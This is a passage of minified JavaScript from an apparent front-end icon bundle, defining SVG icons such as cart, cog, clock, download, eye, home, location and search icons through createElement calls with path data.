8.192a2.05 2.05 0 1 1-2.9 2.9Z"})),top_right_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 49.2 35.29"},(0,o.createElement)("path",{stroke:"rgba(0,0,0,0)",strokeMiterlimit:"10",d:"M32.452 34.186a2.048 2.048 0 0 1 0-2.9l8.192-8.186H10.772A10.283 10.283 0 0 1 .5 12.826V2.55a2.05 2.05 0 0 1 4.1 0v10.276a6.177 6.177 0 0 0 6.171 6.17h29.873L32.452 10.8a2.05 2.05 0 1 1 2.9-2.9l13.141 13.146-13.143 13.14a2.047 2.047 0 0 1-2.9 0Z"})),at_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 49.01 49"},(0,o.createElement)("g",null,(0,o.createElement)("path",{stroke:"rgba(0,0,0,0)",strokeMiterlimit:"10",d:"M22.827 48.441A24 24 0 0 1 25.213.51c12.848.371 23.3 11.359 23.3 24.492a10.359 10.359 0 0 1-10.349 10.352 6.9 6.9 0 0 1-5.878-3.289 10.854 10.854 0 1 1-1.022-16.055v-.313a2.05 2.05 0 1 1 4.1 0v12.757a2.8 2.8 0 0 0 2.8 2.8 6.255 6.255 0 0 0 6.249-6.252c0-10.94-8.663-20.091-19.312-20.4a20.089 20.089 0 0 0-15 6.172 19.723 19.723 0 0 0-5.426 15.328 19.9 19.9 0 0 0 32.162 14.02 2.05 2.05 0 1 1 2.542 3.217 23.974 23.974 0 0 1-14.887 5.163q-.832 0-1.665-.061Zm-5.071-23.939a6.754 6.754 0 1 0 6.757-6.757 6.762 6.762 0 0 0-6.757 6.757Z"}))),refresh:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",enableBackground:"new 0 0 491.236 491.236",version:"1.1",viewBox:"0 0 491.24 491.24"},(0,o.createElement)("path",{d:"m55.89 262.82c-3-26-0.5-51.1 6.3-74.3 22.6-77.1 93.5-133.8 177.6-134.8v-50.4c0-2.8 3.5-4.3 5.8-2.6l103.7 76.2c1.7 1.3 1.7 3.9 0 5.1l-103.6 76.2c-2.4 1.7-5.8 0.2-5.8-2.6v-50.3c-55.3 0.9-102.5 35-122.8 83.2-7.7 18.2-11.6 38.3-10.5 59.4 1.5 29 12.4 55.7 29.6 77.3 9.2 11.5 7 28.3-4.9 37-11.3 8.3-27.1 6-35.8-5-21.3-26.6-35.5-59-39.6-94.4zm299.4-96.8c17.3 21.5 28.2 48.3 29.6 77.3 1.1 21.2-2.9 41.3-10.5 59.4-20.3 48.2-67.5 82.4-122.8 83.2v-50.3c0-2.8-3.5-4.3-5.8-2.6l-103.7 76.2c-1.7 1.3-1.7 3.9 0 5.1l103.6 76.2c2.4 1.7 5.8 0.2 5.8-2.6v-50.4c84.1-0.9 155.1-57.6 177.6-134.8 6.8-23.2 9.2-48.3 6.3-74.3-4-35.4-18.2-67.8-39.5-94.4-8.8-11-24.5-13.3-35.8-5-11.8 8.7-14 25.5-4.8 37z"})),cart_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 44.45 44.14"},(0,o.createElement)("g",null,(0,o.createElement)("path",{d:"M16.72 37.679a3.232 3.232 0 1 0 3.232 3.231 3.234 3.234 0 0 0-3.232-3.231"}),(0,o.createElement)("path",{d:"M33.751 37.679a3.232 3.232 0 1 0 3.232 3.231 3.234 3.234 0 0 0-3.232-3.231"}),(0,o.createElement)("path",{d:"M43.4 6.841A4.557 4.557 0 0 0 39.888 5.2H9.727A6.3 6.3 0 0 0 3.567 0H2.05a2.05 2.05 0 1 0 0 4.1h1.517a2.177 2.177 0 0 1 2.14 1.844l3.2 21.424a8.818 8.818 0 0 0 8.669 7.47h19.2a2.05 2.05 0 1 0 0-4.1h-19.2a4.694 4.694 0 0 1-4.614-3.977l-.022-.145h23.628a5.817 5.817 0 0 0 5.718-4.755l2.091-11.266a4.558 4.558 0 0 0-.977-3.754m-5.145 14.271a1.715 1.715 0 0 1-1.687 1.4H12.332L10.354 9.3h29.534a.466.466 0 0 1 .458.551Z"}))),cart_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 44.46 44.14"},(0,o.createElement)("defs",null,(0,o.createElement)("clipPath",null,(0,o.createElement)("path",{d:"M0 0h44.458v44.14H0z"}))),(0,o.createElement)("g",{"clip-path":"url(#a)"},(0,o.createElement)("path",{d:"M19.95 40.91a3.23 3.23 0 1 1-3.23-3.23 3.235 3.235 0 0 1 3.23 3.23"}),(0,o.createElement)("path",{d:"M36.99 40.91a3.235 3.235 0 1 1-3.24-3.23 3.237 3.237 0 0 1 3.24 3.23"}),(0,o.createElement)("path",{d:"M43.4 6.84a4.568 4.568 0 0 0-3.51-1.64H9.73A6.3 6.3 0 0 0 3.57 0H2.05a2.05 2.05 0 0 0 0 4.1h1.52a2.179 2.179 0 0 1 2.14 1.84l3.2 21.43a8.826 8.826 0 0 0 8.67 7.47h19.2a2.05 2.05 0 1 0 0-4.1h-19.2a4.693 4.693 0 0 1-4.61-3.98l-.02-.14h23.62a5.819 5.819 0 0 0 5.72-4.76l2.09-11.26a4.567 4.567 0 0 0-.98-3.76m-10.96 9.79a.48.48 0 0 1-.48.48h-4.08a.48.48 0 0 0-.48.48v4.08a.48.48 0 0 1-.48.48h-2.04a.487.487 0 0 1-.48-.48v-4.08a.474.474 0 0 0-.48-.48h-4.08a.487.487 0 0 1-.48-.48v-2.04a.48.48 0 0 1 .48-.48h4.08a.48.48 0 0 0 .48-.48V9.55a.48.48 0 0 1 .48-.48h2.04a.474.474 0 0 1 .48.48v4.08a.487.487 0 0 0 .48.48h4.08a.474.474 0 0 1 .48.48Z"}))),cog_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 47.02 47.02"},(0,o.createElement)("g",null,(0,o.createElement)("path",{d:"m26.755 4.404 3.5.939-.432 3.236-.324 2.43 1.987 1.435a12.34 12.34 0 0 1 3.091 3.091l1.435 1.987 2.43-.324 3.236-.432.939 3.5-3 1.237-2.272.937-.246 2.444a13.573 13.573 0 0 1-1.143 4.222l-1 2.238 1.5 1.944 1.989 2.582-2.565 2.565-2.583-1.989-1.944-1.5-2.238 1.006a13.632 13.632 0 0 1-4.221 1.143l-2.445.245-.936 2.272-1.237 3-3.5-.939.432-3.235.324-2.429-1.986-1.436a12.3 12.3 0 0 1-3.092-3.092l-1.436-1.986-2.429.324-3.236.431-.938-3.5 3-1.237 2.271-.936.246-2.445a13.644 13.644 0 0 1 1.143-4.222l1.005-2.238-1.5-1.943-1.989-2.583 2.564-2.565 2.583 1.989 1.944 1.5 2.238-1.005a13.613 13.613 0 0 1 4.222-1.144l2.444-.245.936-2.271Zm-.928-4.4a2.529 2.529 0 0 0-2.337 1.565l-1.763 4.278a17.735 17.735 0 0 0-5.492 1.483l-3.677-2.832a2.527 2.527 0 0 0-3.33.216L4.71 9.231a2.528 2.528 0 0 0-.215 3.33l2.831 3.677a17.765 17.765 0 0 0-1.483 5.492l-4.277 1.764a2.527 2.527 0 0 0-1.479 2.991l1.654 6.171a2.53 2.53 0 0 0 2.776 1.852l4.6-.614a16.438 16.438 0 0 0 4.013 4.013l-.614 4.6a2.527 2.527 0 0 0 1.852 2.776l6.17 1.654a2.56 2.56 0 0 0 .656.086 2.528 2.528 0 0 0 2.336-1.565l1.763-4.278a17.732 17.732 0 0 0 5.493-1.482l3.676 2.831a2.53 2.53 0 0 0 3.331-.215l4.517-4.518a2.528 2.528 0 0 0 .216-3.33l-2.832-3.677a17.738 17.738 0 0 0 1.483-5.492l4.278-1.763a2.529 2.529 0 0 0 1.478-2.992l-1.653-6.171a2.528 2.528 0 0 0-2.44-1.874 2.562 2.562 0 0 0-.337.022l-4.6.615a16.347 16.347 0 0 0-4.013-4.013l.614-4.6a2.528 2.528 0 0 0-1.851-2.776L26.482.092a2.506 2.506 0 0 0-.655-.087"}),(0,o.createElement)("path",{d:"M23.513 19.631a3.877 3.877 0 1 1-2.742 1.136 3.851 3.851 0 0 1 2.742-1.136m0-4.1a7.977 7.977 0 1 0 5.641 2.337 7.952 7.952 0 0 0-5.641-2.337"}))),cog_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 48"},(0,o.createElement)("path",{d:"m47.916 20.964-1.7-6.3a2.568 2.568 0 0 0-2.828-1.889l-4.706.623a19.016 19.016 0 0 0-1.868-2.225 18.136 18.136 0 0 0-2.225-1.868l.622-4.7a2.579 2.579 0 0 0-1.888-2.838l-6.3-1.684a2.569 2.569 0 0 0-3.052 1.511l-1.8 4.358a18.146 18.146 0 0 0-5.614 1.521L12.81 4.585a2.57 2.57 0 0 0-3.4.214L4.796 9.413a2.584 2.584 0 0 0-.225 3.4l2.889 3.756a18.282 18.282 0 0 0-1.511 5.6l-4.369 1.8a2.58 2.58 0 0 0-1.5 3.052l1.685 6.3a2.578 2.578 0 0 0 2.838 1.888l4.7-.622a16.716 16.716 0 0 0 4.093 4.093l-.623 4.706a2.561 2.561 0 0 0 1.889 2.827l6.3 1.695a2.58 2.58 0 0 0 3.052-1.511l1.807-4.369a18.124 18.124 0 0 0 5.6-1.511l3.747 2.889a2.6 2.6 0 0 0 3.409-.224l4.6-4.6a2.585 2.585 0 0 0 .225-3.4l-2.889-3.757a18.143 18.143 0 0 0 1.511-5.6l4.369-1.806a2.591 2.591 0 0 0 1.511-3.052m-17.622 9.327a8.9 8.9 0 1 1 0-12.592 8.895 8.895 0 0 1 0 12.592"})),correct_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 48"},(0,o.createElement)("path",{d:"M24 0a24 24 0 1 0 24 24A24.032 24.032 0 0 0 24 0m12.808 18.247L21.877 33.19a2.68 2.68 0 0 1-1.917.784h-.012a2.724 2.724 0 0 1-1.918-.784l-6.826-6.839a2.475 2.475 0 1 1 3.5-3.5l5.247 5.258 13.362-13.362a2.475 2.475 0 1 1 3.5 3.5"})),dot_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 16.39 16.39"},(0,o.createElement)("path",{d:"M16.389 8.194A8.194 8.194 0 1 1 8.195 0a8.194 8.194 0 0 1 8.194 8.194"})),clock:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",enableBackground:"new 0 0 559.98 559.98",viewBox:"0 0 559.98 559.98"},(0,o.createElement)("path",{d:"m279.99 0c-154.39 0-279.99 125.6-279.99 279.99 0 154.39 125.6 279.99 279.99 279.99 154.39 0 279.99-125.6 279.99-279.99s-125.6-279.99-279.99-279.99zm0 498.78c-120.64 0-218.79-98.146-218.79-218.79 0-120.64 98.146-218.79 218.79-218.79s218.79 98.152 218.79 218.79c0 120.64-98.146 218.79-218.79 218.79z"}),(0,o.createElement)("path",{d:"m304.23 280.33v-117.35c0-13.103-10.618-23.721-23.716-23.721-13.102 0-23.721 10.618-23.721 23.721v124.93c0 0.373 0.092 0.723 0.11 1.096-0.312 6.45 1.91 12.999 6.836 17.926l88.343 88.336c9.266 9.266 24.284 9.266 33.543 0 9.26-9.266 9.266-24.284 0-33.544l-81.395-81.392z"})),book:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",enableBackground:"new 0 0 485.5 485.5",viewBox:"0 0 485.5 485.5"},(0,o.createElement)("path",{d:"m422.1 126.2h-295.7c-27.4 0-49.8-22.3-49.8-49.8 0-27.4 22.3-49.8 49.8-49.8h295.8c7.4 0 13.3-6 13.3-13.3 0-7.4-6-13.3-13.3-13.3h-295.8c-42.1 0-76.4 34.3-76.4 76.4v332.7c0 42.1 34.3 76.4 76.4 76.4h295.8c7.4 0 13.3-6 13.3-13.3v-332.7c-0.1-7.3-6-13.3-13.4-13.3zm-13.3 332.7h-282.4c-27.4 0-49.8-22.3-49.8-49.8v-274.7c13.4 11.5 30.8 18.5 49.8 18.5h282.4v306z"}),(0,o.createElement)("path",{d:"M130.6,64.3c-7.4,0-13.3,6-13.3,13.3s6,13.3,13.3,13.3h249.8c7.4,0,13.3-6,13.3-13.3s-6-13.3-13.3-13.3H130.6z"}),(0,o.createElement)("path",{d:"m177.4 400.7c1.5 0.5 3 0.8 4.5 0.8 5.5 0 10.6-3.4 12.5-8.8l16.2-45.3h62.4c0.5 0 1.1 0 1.6-0.1l16.2 45.4c1.9 5.4 7.1 8.8 12.5 8.8 1.5 0 3-0.3 4.5-0.8 6.9-2.5 10.5-10.1 8-17l-60.6-169.9c-0.1-0.4-0.3-0.8-0.5-1.2l-0.6-1.2c-0.1-0.2-0.3-0.4-0.4-0.7-0.1-0.1-0.2-0.3-0.3-0.4-0.1-0.2-0.3-0.4-0.5-0.6-0.1-0.1-0.2-0.3-0.4-0.4-0.1-0.2-0.3-0.3-0.5-0.5s-0.3-0.3-0.5-0.5c-0.1-0.1-0.3-0.2-0.4-0.4-0.2-0.2-0.4-0.3-0.6-0.5-0.1-0.1-0.3-0.2-0.4-0.3-0.2-0.1-0.4-0.3-0.6-0.4l-0.6-0.3s-0.4-0.2-0.6-0.3c-0.4-0.2-0.8-0.4-1.2-0.5h-0.1l-1.2-0.3c-0.2 0-0.3-0.1-0.5-0.1-0.3-0.1-0.5-0.1-0.8-0.2-0.2 0-0.4 0-0.6-0.1-0.2 0-0.5-0.1-0.7-0.1s-0.4 0-0.6 0h-0.7c-0.2 0-0.5 0-0.7 0.1-0.2 0-0.4 0-0.6 0.1-0.3 0-0.5 0.1-0.8 0.2-0.2 0-0.3 0.1-0.5 0.1-0.4 0.1-0.8 0.2-1.1 0.3h-0.1c-0.4 0.1-0.8 0.3-1.2 0.5l-1.2 0.6c-0.2 0.1-0.4 0.3-0.7 0.4-0.1 0.1-0.3 0.2-0.4 0.3-0.2 0.2-0.4 0.3-0.6 0.5-0.1 0.1-0.3 0.2-0.4 0.4l-0.5 0.5s-0.3 0.3-0.5 0.5c-0.1 0.1-0.2 0.3-0.4 0.4-0.2 0.2-0.3 0.4-0.5 0.6-0.1 0.1-0.2 0.3-0.3 0.4-0.1 0.2-0.3 0.4-0.4 0.6l-0.6 1.2c-0.2 0.4-0.4 0.8-0.5 1.2l-60.8 169.9c-2.2 7 1.4 14.6 8.3 17.1zm65.3-142.9 22.5 63h-45.1l22.6-63z"})),download_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 42 41.99"},(0,o.createElement)("g",null,(0,o.createElement)("path",{d:"M21 32.48 9.307 20.786a2.05 2.05 0 0 1 2.9-2.9l8.8 8.794 8.795-8.794a2.05 2.05 0 0 1 2.9 2.9Z"}),(0,o.createElement)("path",{d:"M21 31.625a2.05 2.05 0 0 1-2.05-2.05V2.045a2.05 2.05 0 1 1 4.1 0v27.53a2.05 2.05 0 0 1-2.05 2.05"}),(0,o.createElement)("path",{d:"M37.603 41.992H4.397a4.368 4.368 0 0 1-4.4-4.331v-8.693a2.05 2.05 0 0 1 4.1 0v8.693a.273.273 0 0 0 .3.231h33.206a.273.273 0 0 0 .3-.231v-8.693a2.05 2.05 0 1 1 4.1 0v8.693a4.368 4.368 0 0 1-4.4 4.331"}))),download_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 41.6"},(0,o.createElement)("g",null,(0,o.createElement)("path",{d:"M30.777 0a17.252 17.252 0 0 0-15.969 10.734 12.026 12.026 0 1 0-5.2 23.479 2.084 2.084 0 0 0 .413.042 2.051 2.051 0 0 0 .409-4.06 7.924 7.924 0 0 1 1.6-15.686 7.84 7.84 0 0 1 3.231.691l2.2.986.617-2.333a13.132 13.132 0 0 1 25.821 3.372 12.993 12.993 0 0 1-4.169 9.6 2.052 2.052 0 0 0 2.8 3A17.229 17.229 0 0 0 30.779.002"}),(0,o.createElement)("path",{d:"M34.188 29.466h-5.18V15.578a1.164 1.164 0 0 0-1.164-1.164h-3.94a1.164 1.164 0 0 0-1.164 1.164v13.888h-5.18a1.164 1.164 0 0 0-.888 1.917l8.314 9.8a1.164 1.164 0 0 0 1.775 0l8.315-9.8a1.164 1.164 0 0 0-.888-1.917"}))),downlod_bottom_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 36 48"},(0,o.createElement)("g",null,(0,o.createElement)("path",{d:"m35.531 19.421-15.929 15.91a2.257 2.257 0 0 1-3.208 0L.479 19.421a1.617 1.617 0 0 1 1.152-2.762H11.89V1.381A1.379 1.379 0 0 1 13.257 0h9.482a1.369 1.369 0 0 1 1.367 1.381v15.278H34.38a1.623 1.623 0 0 1 1.151 2.762"}),(0,o.createElement)("path",{d:"M34.743 48H1.259a1.257 1.257 0 0 1-1.257-1.257v-4.762a1.257 1.257 0 0 1 1.257-1.257h33.486a1.257 1.257 0 0 1 1.257 1.257v4.762A1.257 1.257 0 0 1 34.745 48"}))),eye:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 35.9"},(0,o.createElement)("g",null,(0,o.createElement)("path",{d:"M24.001 4.1c6.315 0 12.993 4.6 19.847 13.684a.3.3 0 0 1 0 .337c-6.854 9.08-13.532 13.683-19.847 13.683s-12.993-4.6-19.847-13.683a.3.3 0 0 1 0-.337C11.008 8.704 17.686 4.1 24.001 4.1m0-4.1Q12.44 0 .881 15.313a4.395 4.395 0 0 0 0 5.278q11.559 15.312 23.12 15.313T47.12 20.591a4.393 4.393 0 0 0 0-5.277Q35.561.001 24.001 0"}),(0,o.createElement)("path",{d:"M24.001 13.284a4.669 4.669 0 1 1-4.669 4.669 4.674 4.674 0 0 1 4.669-4.669m0-4.1a8.769 8.769 0 1 0 8.769 8.769 8.769 8.769 0 0 0-8.769-8.769"}))),hidden_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 49.24 41"},(0,o.createElement)("g",null,(0,o.createElement)("path",{stroke:"rgba(0,0,0,0)",strokeMiterlimit:"10",d:"m41.124 39.9-5.14-5.14a20.7 20.7 0 0 1-11.36 3.69q-11.565 0-23.12-15.311a4.409 4.409 0 0 1 0-5.279 56.335 56.335 0 0 1 8.44-9.14L5.224 4a2.051 2.051 0 0 1 2.9-2.9l35.9 35.9a2.05 2.05 0 0 1-2.9 2.9ZM4.771 20.33a.3.3 0 0 0 0 .34c6.861 9.08 13.531 13.68 19.853 13.68a16.26 16.26 0 0 0 8.38-2.57l-3.8-3.8a8.771 8.771 0 0 1-13.353-7.48 8.584 8.584 0 0 1 1.3-4.57l-4.3-4.3a51.722 51.722 0 0 0-8.08 8.7Zm15.18.17a4.675 4.675 0 0 0 4.673 4.67 4.743 4.743 0 0 0 1.52-.25l-5.93-5.93a4.437 4.437 0 0 0-.262 1.51Zm19.46 6.09a60.236 60.236 0 0 0 5.06-5.92.3.3 0 0 0 0-.34c-6.86-9.08-13.53-13.68-19.847-13.68a14.119 14.119 0 0 0-4.42.73l-3.18-3.18a18.991 18.991 0 0 1 7.6-1.65q11.565 0 23.12 15.31a4.409 4.409 0 0 1 0 5.279 62.616 62.616 0 0 1-5.431 6.35Z"}))),home_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 42 42"},(0,o.createElement)("path",{d:"m21.002 4.511 16.9 13.6V37.9h-9.05V22.61a4.215 4.215 0 0 0-4.21-4.21h-7.28a4.215 4.215 0 0 0-4.21 4.21V37.9h-9.05V18.111Zm0-4.511a2.647 2.647 0 0 0-1.663.586L.992 15.352a2.65 2.65 0 0 0-.99 2.068v21.93a2.652 2.652 0 0 0 2.652 2.652h11.948a2.652 2.652 0 0 0 2.652-2.652V22.61a.11.11 0 0 1 .11-.11h7.28a.11.11 0 0 1 .11.11v16.738A2.652 2.652 0 0 0 27.406 42h11.946a2.652 2.652 0 0 0 2.652-2.652V17.42a2.653 2.653 0 0 0-.989-2.066L22.667.588a2.645 2.645 0 0 0-1.663-.586"})),home_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 42 42"},(0,o.createElement)("path",{d:"M42 17.418v21.93A2.652 2.652 0 0 1 39.348 42H28.402a2.652 2.652 0 0 1-2.652-2.652V23.205a1.705 1.705 0 0 0-1.705-1.705h-6.09a1.705 1.705 0 0 0-1.7 1.705v16.143A2.652 2.652 0 0 1 13.603 42H2.652A2.652 2.652 0 0 1 0 39.348v-21.93a2.653 2.653 0 0 1 .989-2.066L19.337.586a2.654 2.654 0 0 1 3.326 0l18.348 14.768A2.653 2.653 0 0 1 42 17.42"})),location_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 36 48"},(0,o.createElement)("g",null,(0,o.createElement)("path",{d:"M18 4.1A13.916 13.916 0 0 1 31.9 18c0 8.944-8.482 19.142-13.9 24.445-5.42-5.3-13.9-15.5-13.9-24.445A13.916 13.916 0 0 1 18 4.1M18 0A18 18 0 0 0 0 18c0 14.9 18 30 18 30s18-15.1 18-30A18 18 0 0 0 18 0"}),(0,o.createElement)("path",{d:"M18 12.301a5.7 5.7 0 1 1-5.7 5.7 5.706 5.706 0 0 1 5.7-5.7m0-4.1a9.8 9.8 0 1 0 9.8 9.8 9.8 9.8 0 0 0-9.8-9.8"}))),location_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 36 48"},(0,o.createElement)("path",{d:"M18 0A18 18 0 0 0 0 18c0 14.9 18 30 18 30s18-15.1 18-30A18 18 0 0 0 18 0m0 27.8a9.8 9.8 0 1 1 9.8-9.8 9.8 9.8 0 0 1-9.8 9.8"})),love_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 46 41"},(0,o.createElement)("path",{d:"M12.724 4.1a8.539 8.539 0 0 1 6.1 2.529l1.285 1.285 2.912 2.912 2.9-2.925 1.258-1.269a8.624 8.624 0 1 1 12.2 12.192l-1.286 1.286-15.084 15.093L7.916 20.109 6.63 18.824a8.635 8.635 0 0 1 .007-12.2 8.533 8.533 0 0 1 6.091-2.522m0-4.1a12.726 12.726 0 0 0-9 21.723l1.286 1.286 17.993 17.993L40.99 23.011l1.285-1.286A12.723 12.723 0 0 0 24.281 3.732l-1.274 1.285-1.285-1.285a12.646 12.646 0 0 0-9-3.73"})),love_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 46 39.92"},(0,o.createElement)("path",{d:"M46.004 12.889a16.521 16.521 0 0 1-1.227 5.493C39.998 30.36 23.004 39.917 23.004 39.917s-17-9.557-21.773-21.535a16.518 16.518 0 0 1-1.227-5.493 12.893 12.893 0 0 1 23-8 12.889 12.889 0 0 1 23 8"})),notice_circle_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 48"},(0,o.createElement)("path",{d:"M24.002 0a24 24 0 1 0 24 24 24.032 24.032 0 0 0-24-24m2.51 37.17a3.557 3.557 0 0 1-5.03-5.03 3.6 3.6 0 0 1 2.52-1.04 3.551 3.551 0 0 1 3.55 3.55 3.6 3.6 0 0 1-1.04 2.52m1.04-13.57a3.55 3.55 0 1 1-7.1 0V13.34a3.55 3.55 0 1 1 7.1 0Z"})),notice_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 42.2"},(0,o.createElement)("path",{d:"M47.67 38.57 26.105 1.218a2.417 2.417 0 0 0-4.2 0L.328 38.57a2.42 2.42 0 0 0 2.1 3.632h43.143a2.42 2.42 0 0 0 2.1-3.632m-21.915-3.529a2.473 2.473 0 1 1 .724-1.748 2.456 2.456 0 0 1-.724 1.748m.724-9.471a2.473 2.473 0 1 1-4.945 0V15.148a2.473 2.473 0 0 1 4.945 0Z"})),pause_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 32.87 42"},(0,o.createElement)("g",null,(0,o.createElement)("path",{d:"M9.583 42.002H1.992A1.992 1.992 0 0 1 0 40.01V1.991A1.992 1.992 0 0 1 1.992 0h7.591a1.991 1.991 0 0 1 1.991 1.991v38.018a1.992 1.992 0 0 1-1.991 1.992"}),(0,o.createElement)("path",{d:"M30.88 42.002h-7.59a1.992 1.992 0 0 1-1.992-1.992V1.991A1.992 1.992 0 0 1 23.29 0h7.59a1.991 1.991 0 0 1 1.991 1.991v38.018a1.992 1.992 0 0 1-1.991 1.992"}))),play_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 48"},(0,o.createElement)("g",null,(0,o.createElement)("path",{d:"M24 4.1A19.9 19.9 0 1 1 4.1 24 19.922 19.922 0 0 1 24 4.1M24 0a24 24 0 1 0 24 24A24 24 0 0 0 24 0"}),(0,o.createElement)("path",{d:"M19.961 16.237v15.526L31.175 24Z"}))),videoplay:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 32.06 42"},(0,o.createElement)("path",{d:"M30.717 18.446 4.87.557A3.106 3.106 0 0 0-.004 3.111v35.778a3.106 3.106 0 0 0 4.874 2.554l25.843-17.889a3.105 3.105 0 0 0 0-5.107"})),left_angle_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 32.06 42"},(0,o.createElement)("path",{d:"M1.339 18.446 27.182.557a3.106 3.106 0 0 1 4.874 2.554v35.778a3.106 3.106 0 0 1-4.874 2.554L1.339 23.554a3.105 3.105 0 0 1 0-5.107"})),caretArrow:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 292.36 292.36"},(0,o.createElement)("path",{d:"m286.94 197.29-127.91-127.91c-3.613-3.617-7.895-5.424-12.847-5.424s-9.233 1.807-12.85 5.424l-127.91 127.91c-3.617 3.617-5.424 7.899-5.424 12.847s1.807 9.233 5.424 12.847c3.621 3.617 7.902 5.425 12.85 5.425h255.81c4.949 0 9.233-1.808 12.848-5.425 3.613-3.613 5.427-7.898 5.427-12.847s-1.814-9.23-5.427-12.847z"})),rectangle_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 16.39 16.39"},(0,o.createElement)("path",{d:"M0 0h16.389v16.389H0z"})),restriction_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 49 49"},(0,o.createElement)("path",{stroke:"rgba(0,0,0,0)",strokeMiterlimit:"10",d:"M.5 24.5a24 24 0 1 1 24 24 24 24 0 0 1-24-24Zm24 19.9a19.89 19.89 0 0 0 15.44-32.441L11.958 39.94A19.809 19.809 0 0 0 24.5 44.4ZM4.6 24.5a19.808 19.808 0 0 0 4.46 12.542L37.041 9.06A19.891 19.891 0 0 0 4.6 24.5Z"})),right_circle_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 48"},(0,o.createElement)("g",null,(0,o.createElement)("path",{d:"M24 4.1A19.9 19.9 0 1 1 4.1 24 19.922 19.922 0 0 1 24 4.1M24 0a24 24 0 1 0 24 24A24 24 0 0 0 24 0"}),(0,o.createElement)("path",{d:"M20.333 32.836a2.258 2.258 0 0 1-1.6-.664l-6.179-6.178a2.05 2.05 0 0 1 2.9-2.9l4.885 4.884 12.217-12.216a2.05 2.05 0 0 1 2.9 2.9l-13.51 13.51a2.259 2.259 0 0 1-1.6.664"}))),save_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 40.1 28.53"},(0,o.createElement)("path",{d:"M13.451 28.532a2.428 2.428 0 0 1-1.73-.716L.6 16.696a2.05 2.05 0 0 1 2.9-2.9l9.952 9.95L36.601.598a2.05 2.05 0 0 1 2.9 2.9L15.183 27.816a2.428 2.428 0 0 1-1.73.716"})),search_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 47.05 47.05"},(0,o.createElement)("path",{stroke:"rgba(0,0,0,0)",strokeMiterlimit:"10",d:"m43.051 45.948-9.618-9.616a20.183 20.183 0 1 1 2.9-2.9l9.617 9.616a2.05 2.05 0 1 1-2.9 2.9Zm-22.367-9.179A16.084 16.084 0 1 0 4.6 20.684a16.1 16.1 0 0 0 16.084 16.085Z"})),search_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 44 44"},(0,o.createElement)("g",null,(0,o.createElement)("path",{d:"M15.772 12.518a2.3 2.3 0 0 0-3.254 0 8.572 8.572 0 0 0 0 12.125 2.301 2.301 0 0 0 3.254-3.255 3.97 3.97 0 0 1 0-5.615 2.3 2.3 0 0 0 0-3.255"}),(0,o.createElement)("path",{d:"m42.83 38.178-9.589-8.208a18.627 18.627 0 1 0-3.268 3.267l8.209 9.589a3.294 3.294 0 1 0 4.648-4.648m-24.25-5.624a13.978 13.978 0 1 1 13.977-13.977A13.993 13.993 0 0 1 18.58 32.554"}))),triangle_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 18.92 16.39"},(0,o.createElement)("path",{d:"M9.462 0 0 16.389h18.924Z"})),warning_circle_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 48"},(0,o.createElement)("g",null,(0,o.createElement)("path",{d:"M24 4.1A19.9 19.9 0 1 1 4.1 24 19.922 19.922 0 0 1 24 4.1M24 0a24 24 0 1 0 24 24A24 24 0 0 0 24 0"}),(0,o.createElement)("path",{d:"M24 27.789a2.05 2.05 0 0 1-2.05-2.05V15.448a2.05 2.05 0 0 1 4.1 0v10.291a2.05 2.05 0 0 1-2.05 2.05"}),(0,o.createElement)("path",{d:"M24 35.161a2.05 2.05 0 1 1 2.049-2.05A2.05 